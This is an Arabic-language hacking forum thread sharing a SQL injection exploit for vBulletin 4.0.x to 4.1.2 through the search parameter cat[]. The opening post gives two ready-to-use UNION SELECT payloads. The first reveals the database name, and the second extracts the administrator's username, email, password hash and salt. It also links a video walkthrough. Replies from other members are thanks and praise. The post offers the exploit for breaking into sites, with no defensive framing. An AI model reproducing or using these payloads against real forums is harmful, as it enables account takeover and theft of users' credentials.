vBulletin 4.0.x => 4.1.2 SQL Injection Vulnerability

السلام عليكم ورحمه الله وبركاته الموضوع واضح من العنوان ثغره في المنتديات اصدار 4 لحتى اصدار 4.1.2 الثغره بمحرك البحث نروح محرك البحث ونكتب...

K

KaLa$nikoV

<b><font color="DarkRed" size="2">VBSPIDERS TEAM</
vBulletin 4.0.x => 4.1.2 SQL Injection Vulnerability
السلام عليكم ورحمه الله وبركاته


الموضوع واضح من العنوان ثغره في المنتديات اصدار 4 لحتى اصدار 4.1.2

الثغره بمحرك البحث

نروح محرك البحث ونكتب استعلام الحقن


&cat[0]=1) UNION SELECT database()#
أنقر للتوسيع...

يظهر لنا الداتابيز
وهيك نجيب باس الادمن

&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#
أنقر للتوسيع...


وهذا فيديو شرح

http://www.youtube.com/watch?v=fR9RGCqIPkc

مكتشف الثغره D4rkB1t

بالتوفيق
 
اسم الموضوع : vBulletin 4.0.x => 4.1.2 SQL Injection Vulnerability | المصدر : قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات
J

JetLi

New Member
vBulletin 4.0.x => 4.1.2 SQL Injection Vulnerability
يسلمووووووووووووووووا ولو انها طريقة متعبة ولكن لا بأس ، مجهود رائع رائع والله الفيبي معذبنا
 
C

ChucK NoRRis

New Member
vBulletin 4.0.x => 4.1.2 SQL Injection Vulnerability
خطيييييير يا فولكانو !!

ثغرة جديدة تنضاف لثفرات Vbulletin العديدة
 
D

dr sow

New Member
vBulletin 4.0.x => 4.1.2 SQL Injection Vulnerability
قمة في الابدع فولكانو كما قال الاخ
ال في بي معدبنا
 
B

bleu moon

vBulletin 4.0.x => 4.1.2 SQL Injection Vulnerability
مشكوور يا اخي فولكانو وآسف على الغياب، رح اقولك السبب بعدين
 
يجب تسجيل الدخول أو التسجيل كي تتمكن من الرد هنا.
أعلى